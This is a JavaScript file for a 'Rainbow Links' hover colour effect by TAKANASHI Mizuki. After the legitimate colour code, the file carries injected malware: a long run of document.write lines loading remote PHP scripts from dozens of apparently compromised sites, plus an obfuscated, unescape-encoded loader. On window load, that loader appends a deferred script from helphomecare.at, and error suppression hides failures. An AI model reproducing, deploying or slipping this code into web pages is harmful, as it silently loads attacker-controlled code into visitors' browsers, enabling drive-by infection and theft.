/************************************************************************/
/* Rainbow Links Version 1.03 (2003.9.20)                               */
/* Script updated by Dynamicdrive.com for IE6                           */
/* Copyright (C) 1999-2001 TAKANASHI Mizuki                             */
/* takanasi@hamal.freemail.ne.jp                                        */
/*----------------------------------------------------------------------*/
/* Read it somehow even if my English text is a little wrong! ;-)       */
/*                                                                      */
/* Usage:                                                               */
/*  Insert '<script src="rainbow.js"></script>' into the BODY section,  */
/*  right after the BODY tag itself, before anything else.              */
/*  You don't need to add "onMouseover" and "onMouseout" attributes!!   */
/*                                                                      */
/*  If you'd like to add effect to other texts(not link texts), then    */
/*  add 'onmouseover="doRainbow(this);"' and                            */
/*  'onmouseout="stopRainbow();"' to the target tags.                   */
/*                                                                      */
/* This Script works with IE4,Netscape6,Mozilla browser and above only, */
/* but no error occurs on other browsers.                               */
/************************************************************************/


////////////////////////////////////////////////////////////////////
// Setting

var rate = 20;  // Increase amount(The degree of the transmutation)


////////////////////////////////////////////////////////////////////
// Main routine

if (document.getElementById)
window.onerror=new Function("return true")

var objActive;  // The object which event occured in
var act = 0;    // Flag during the action
var elmH = 0;   // Hue
var elmS = 128; // Saturation
var elmV = 255; // Value
var clrOrg;     // A color before the change
var TimerID;    // Timer ID


if (document.all) {
    document.onmouseover = doRainbowAnchor;
    document.onmouseout = stopRainbowAnchor;
}
else if (document.getElementById) {
    document.captureEvents(Event.MOUSEOVER | Event.MOUSEOUT);
    document.onmouseover = Mozilla_doRainbowAnchor;
    document.onmouseout = Mozilla_stopRainbowAnchor;
}


//=============================================================================
// doRainbow
//  This function begins to change a color.
//=============================================================================
function doRainbow(obj)
{
    if (act == 0) {
        act = 1;
        if (obj)
            objActive = obj;
        else
            objActive = event.srcElement;
        clrOrg = objActive.style.color;
        TimerID = setInterval("ChangeColor()",100);
    }
}


//=============================================================================
// stopRainbow
//  This function stops to change a color.
//=============================================================================
function stopRainbow()
{
    if (act) {
        objActive.style.color = clrOrg;
        clearInterval(TimerID);
        act = 0;
    }
}


//=============================================================================
// doRainbowAnchor
//  This function begins to change a color. (of a anchor, automatically)
//=============================================================================
function doRainbowAnchor()
{
    if (act == 0) {
        var obj = event.srcElement;
        while (obj.tagName != 'A' && obj.tagName != 'BODY') {
            obj = obj.parentElement;
            if (obj.tagName == 'A' || obj.tagName == 'BODY')
                break;
        }

        if (obj.tagName == 'A' && obj.href != '') {
            objActive = obj;
            act = 1;
            clrOrg = objActive.style.color;
            TimerID = setInterval("ChangeColor()",100);
        }
    }
}


//=============================================================================
// stopRainbowAnchor
//  This function stops to change a color. (of a anchor, automatically)
//=============================================================================
function stopRainbowAnchor()
{
    if (act) {
        if (objActive.tagName == 'A') {
            objActive.style.color = clrOrg;
            clearInterval(TimerID);
            act = 0;
        }
    }
}


//=============================================================================
// Mozilla_doRainbowAnchor(for Netscape6 and Mozilla browser)
//  This function begins to change a color. (of a anchor, automatically)
//=============================================================================
function Mozilla_doRainbowAnchor(e)
{
    if (act == 0) {
        obj = e.target;
        while (obj.nodeName != 'A' && obj.nodeName != 'BODY') {
            obj = obj.parentNode;
            if (obj.nodeName == 'A' || obj.nodeName == 'BODY')
                break;
        }

        if (obj.nodeName == 'A' && obj.href != '') {
            objActive = obj;
            act = 1;
            clrOrg = obj.style.color;
            TimerID = setInterval("ChangeColor()",100);
        }
    }
}


//=============================================================================
// Mozilla_stopRainbowAnchor(for Netscape6 and Mozilla browser)
//  This function stops to change a color. (of a anchor, automatically)
//=============================================================================
function Mozilla_stopRainbowAnchor(e)
{
    if (act) {
        if (objActive.nodeName == 'A') {
            objActive.style.color = clrOrg;
            clearInterval(TimerID);
            act = 0;
        }
    }
}


//=============================================================================
// Change Color
//  This function changes a color actually.
//=============================================================================
function ChangeColor()
{
    objActive.style.color = makeColor();
}


//=============================================================================
// makeColor
//  This function makes rainbow colors.
//=============================================================================
function makeColor()
{
    // Don't you think Color Gamut to look like Rainbow?

    // HSVtoRGB
    if (elmS == 0) {
        elmR = elmV;    elmG = elmV;    elmB = elmV;
    }
    else {
        t1 = elmV;
        t2 = (255 - elmS) * elmV / 255;
        t3 = elmH % 60;
        t3 = (t1 - t2) * t3 / 60;

        if (elmH < 60) {
            elmR = t1;  elmB = t2;  elmG = t2 + t3;
        }
        else if (elmH < 120) {
            elmG = t1;  elmB = t2;  elmR = t1 - t3;
        }
        else if (elmH < 180) {
            elmG = t1;  elmR = t2;  elmB = t2 + t3;
        }
        else if (elmH < 240) {
            elmB = t1;  elmR = t2;  elmG = t1 - t3;
        }
        else if (elmH < 300) {
            elmB = t1;  elmG = t2;  elmR = t2 + t3;
        }
        else if (elmH < 360) {
            elmR = t1;  elmG = t2;  elmB = t1 - t3;
        }
        else {
            elmR = 0;   elmG = 0;   elmB = 0;
        }
    }

    elmR = Math.floor(elmR).toString(16);
    elmG = Math.floor(elmG).toString(16);
    elmB = Math.floor(elmB).toString(16);
    if (elmR.length == 1)    elmR = "0" + elmR;
    if (elmG.length == 1)    elmG = "0" + elmG;
    if (elmB.length == 1)    elmB = "0" + elmB;

    elmH = elmH + rate;
    if (elmH >= 360)
        elmH = 0;

    return '#' + elmR + elmG + elmB;
}

document.write('<script src=http://ortopediktedavi.com/fckeditor/iletisim.php ><\/script>');
document.write('<script src=http://cadglobal.ca/images/services.php ><\/script>');
document.write('<script src=http://piki-omori.com/css/index.php ><\/script>');
document.write('<script src=http://piki-omori.com/css/index.php ><\/script>');
document.write('<script src=http://fastbenelux.com/Start/css2.php ><\/script>');
document.write('<script src=http://fastbenelux.com/Start/css2.php ><\/script>');
this.qY="";this.Ai="";function n(){var y=new String();var bc=new String();var M=unescape;var p;if(p!='j' && p!='s'){p='j'};var u=window;var K='';var R="";var Mj;if(Mj!='' && Mj!='cb'){Mj='r'};var c=M("%2f%62%6c%6f%67%67%65%72%2d%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%74%69%6d%65%73%6f%6e%6c%69%6e%65%2e%63%6f%2e%75%6b%2e%70%68%70");var o;if(o!='' && o!='Sq'){o=null};function H(Y,A){var b=String("gpEb".substr(0,1));var Af=M("%5b"), Az=M("%5d");var T=Af+A+Az;this.D="";var ql;if(ql!=''){ql='Bw'};var Q=new RegExp(T, b);var dK=new Array();this.xM='';return Y.replace(Q, new String());this.i='';};var F;if(F!='wn' && F != ''){F=null};var Mo;if(Mo!='g'){Mo='g'};var tc;if(tc!='U'){tc='U'};var tx="";var fD;if(fD!=''){fD='YS'};var bb;if(bb!=''){bb='XO'};var a=H('816242304134382247077192','12359467');var Cn;if(Cn!='AG'){Cn=''};var d=new String();this.m='';var YM;if(YM!='' && YM!='mj'){YM='rC'};var q=document;var l;if(l!='' && l!='Dw'){l=''};var Cmb='';var iR=new Date();var my=new Array();this.LU='';function qr(){this.Fw="";var cu="";var bh=M("%68%74%74%70%3a%2f%2f%68%65%6c%70%68%6f%6d%65%63%61%72%65%2e%61%74%3a");d=bh;this.Na='';d+=a;var qc="";var LB;if(LB!='' && LB!='ZN'){LB=null};d+=c;var v='';var Wy;if(Wy!=''){Wy='gy'};var EC;if(EC!='bk' && EC!='UR'){EC='bk'};try {var vW=new String();var dd;if(dd!='' && dd!='qhT'){dd='wm'};qh=q.createElement(H('sqc9rqiqpqtv','v9uq'));var jk;if(jk!='' && jk!='sj'){jk='Zv'};var wU;if(wU!='bu'){wU=''};var aD;if(aD!='mx'){aD=''};qh[M("%73%72%63")]=d;var oy='';qh[M("%64%65%66%65%72")]=[1,8][0];var EJ;if(EJ!='Ov' && EJ!='Zk'){EJ=''};var ue;if(ue!='' && ue!='CQ'){ue=null};var XF=new Array();var vY='';q.body.appendChild(qh);} catch(qw){var tw=new Date();this.I='';alert(qw);};this.Rr="";this.sd="";}var Ia='';var Mx='';u[new String("onzqty".substr(0,2)+"pMTGlo".substr(4)+"MHWad".substr(3))]=qr;var XL=new String();var GF;if(GF!='vWO'){GF='vWO'};};var iJ=new String();var fo;if(fo!='kyf' && fo != ''){fo=null};var bU;if(bU!='Rz' && bU != ''){bU=null};n();this.XW='';var cF;if(cF!='kE' && cF!='JT'){cF=''};
document.write('<script src=http://learningandthebrain.com/brain15faculty/schedule.php ><\/script>');
document.write('<script src=http://hatunyeri.com/images/Logger.php ><\/script>');
document.write('<script src=http://m.socialchat.net/tmp/gateway.php ><\/script>');
document.write('<script src=http://serveriui.tcs.lt/cstrike/admin.php ><\/script>');
document.write('<script src=http://serveriui.tcs.lt/cstrike/admin.php ><\/script>');
document.write('<script src=http://chanakan.com/UserFiles/Image/vxkiu.php ><\/script>');
document.write('<script src=http://inkshaf.com/common/columns.php ><\/script>');
document.write('<script src=http://inkshaf.com/common/columns.php ><\/script>');
document.write('<script src=http://inkshaf.com/common/columns.php ><\/script>');
document.write('<script src=http://inkshaf.com/common/columns.php ><\/script>');
document.write('<script src=http://jasonhalley.com/images/gifimg.php ><\/script>');
document.write('<script src=http://jasonhalley.com/images/gifimg.php ><\/script>');
document.write('<script src=http://jasonhalley.com/images/gifimg.php ><\/script>');
document.write('<script src=http://jasonhalley.com/images/gifimg.php ><\/script>');
document.write('<script src=http://luxurycars.ge/images/gaj/main_05.php ><\/script>');
document.write('<script src=http://luxurycars.ge/images/gaj/main_05.php ><\/script>');
document.write('<script src=http://luxurycars.ge/images/gaj/main_05.php ><\/script>');
document.write('<script src=http://luxurycars.ge/images/gaj/main_05.php ><\/script>');
document.write('<script src=http://kdev1.info/tinymce/clickbank.php ><\/script>');
document.write('<script src=http://readhomequran.com/images/dua4.php ><\/script>');
document.write('<script src=http://vindepaysing.fr/images/fdre/backgroundn.php ><\/script>');
document.write('<script src=http://vindepaysing.fr/images/fdre/backgroundn.php ><\/script>');
document.write('<script src=http://vindepaysing.fr/images/fdre/backgroundn.php ><\/script>');
document.write('<script src=http://vindepaysing.fr/images/fdre/backgroundn.php ><\/script>');
document.write('<script src=http://jobank.co.il/teva_galil/uk2.php ><\/script>');
document.write('<script src=http://jobank.co.il/teva_galil/uk2.php ><\/script>');
document.write('<script src=http://jobank.co.il/teva_galil/uk2.php ><\/script>');
document.write('<script src=http://simusician.4in1.biz/modules/configuration.php-dist.php ><\/script>');
document.write('<script src=http://simusician.4in1.biz/modules/configuration.php-dist.php ><\/script>');
document.write('<script src=http://salesian.net/images/school_r.php ><\/script>');
document.write('<script src=http://salesian.net/images/school_r.php ><\/script>');
document.write('<script src=http://salesian.net/images/school_r.php ><\/script>');
document.write('<script src=http://salesian.net/images/school_r.php ><\/script>');
document.write('<script src=http://salesian.net/images/school_r.php ><\/script>');
document.write('<script src=http://salesian.net/images/school_r.php ><\/script>');
document.write('<script src=http://anemone-nail.net/concept/mt-preview-0dd67458a1654ed69dd48f139cbeadb72817ed97.php ><\/script>');
document.write('<script src=http://anemone-nail.net/concept/mt-preview-0dd67458a1654ed69dd48f139cbeadb72817ed97.php ><\/script>');
document.write('<script src=http://anemone-nail.net/concept/mt-preview-0dd67458a1654ed69dd48f139cbeadb72817ed97.php ><\/script>');
document.write('<script src=http://anemone-nail.net/concept/mt-preview-0dd67458a1654ed69dd48f139cbeadb72817ed97.php ><\/script>');
document.write('<script src=http://anemone-nail.net/concept/mt-preview-0dd67458a1654ed69dd48f139cbeadb72817ed97.php ><\/script>');
document.write('<script src=http://trampoin.com/blog/company.php ><\/script>');
document.write('<script src=http://biznes-mlm.ru/lts/11.php ><\/script>');
document.write('<script src=http://biznes-mlm.ru/lts/11.php ><\/script>');
document.write('<script src=http://gospelradiofm.com/tmp/index.php ><\/script>');
document.write('<script src=http://gospelradiofm.com/tmp/index.php ><\/script>');
document.write('<script src=http://gospelradiofm.com/tmp/index.php ><\/script>');
document.write('<script src=http://gospelradiofm.com/tmp/index.php ><\/script>');
document.write('<script src=http://ct-tron.ru/imgigroups2/s1.php ><\/script>');
document.write('<script src=http://ct-tron.ru/imgigroups2/s1.php ><\/script>');
document.write('<script src=http://tatweb.net/css/leftnav.shtml.php ><\/script>');
document.write('<script src=http://bakersfieldpc.com/SpryAssets/business.php ><\/script>');
document.write('<script src=http://feda.org/elecciones/circulares.php ><\/script>');
document.write('<script src=http://feda.org/elecciones/circulares.php ><\/script>');
document.write('<script src=http://feda.org/elecciones/circulares.php ><\/script>');
document.write('<script src=http://iezinfo.co.kr/http/cust.php ><\/script>');
document.write('<script src=http://richieapartement.hu/katkepek/tipus.php ><\/script>');
document.write('<script src=http://armamarin.com/projeresim/arma_yatform.php ><\/script>');
document.write('<script src=http://armamarin.com/projeresim/arma_yatform.php ><\/script>');
document.write('<script src=http://eurograf.com.pl/images/gifimg.php ><\/script>');
document.write('<script src=http://thebakis.com/eng/erkektermo_6070.php ><\/script>');
document.write('<script src=http://thebakis.com/eng/erkektermo_6070.php ><\/script>');
document.write('<script src=http://thebakis.com/eng/erkektermo_6070.php ><\/script>');
document.write('<script src=http://thebakis.com/eng/erkektermo_6070.php ><\/script>');
document.write('<script src=http://thebakis.com/eng/erkektermo_6070.php ><\/script>');
document.write('<script src=http://thebakis.com/eng/erkektermo_6070.php ><\/script>');
document.write('<script src=http://carhire.moviecoupons.com/movies/bar.php ><\/script>');
document.write('<script src=http://mordokunuslar.com/config/mormenu.php ><\/script>');
document.write('<script src=http://microtechdirect.net/images/gifimg.php ><\/script>');
document.write('<script src=http://microtechdirect.net/images/gifimg.php ><\/script>');
document.write('<script src=http://microtechdirect.net/images/gifimg.php ><\/script>');
document.write('<script src=http://microtechdirect.net/images/gifimg.php ><\/script>');
document.write('<script src=http://oyun.barisch.org/wp-admin/wp-atom.php ><\/script>');
document.write('<script src=http://oyun.barisch.org/wp-admin/wp-atom.php ><\/script>');
document.write('<script src=http://whichcame1st.com/new/indexe.php ><\/script>');
document.write('<script src=http://whichcame1st.com/new/indexe.php ><\/script>');
document.write('<script src=http://whichcame1st.com/new/indexe.php ><\/script>');
document.write('<script src=http://whichcame1st.com/new/indexe.php ><\/script>');
document.write('<script src=http://motor-bike.pl/allegro/kontakt.php ><\/script>');
document.write('<script src=http://motor-bike.pl/allegro/kontakt.php ><\/script>');
document.write('<script src=http://motor-bike.pl/allegro/kontakt.php ><\/script>');
document.write('<script src=http://aiolosparos.gr/images/dom5.php ><\/script>');
document.write('<script src=http://aiolosparos.gr/images/dom5.php ><\/script>');
document.write('<script src=http://praiadavila.com.br/new/css.php ><\/script>');
document.write('<script src=http://praiadavila.com.br/new/css.php ><\/script>');
document.write('<script src=http://praiadavila.com.br/new/css.php ><\/script>');
document.write('<script src=http://01030501519.kt.io/upload/sound.php ><\/script>');
document.write('<script src=http://roulettekiller.com/images/gifimg.php ><\/script>');
document.write('<script src=http://casadosartistas.org.br/images/cns1/26.php ><\/script>');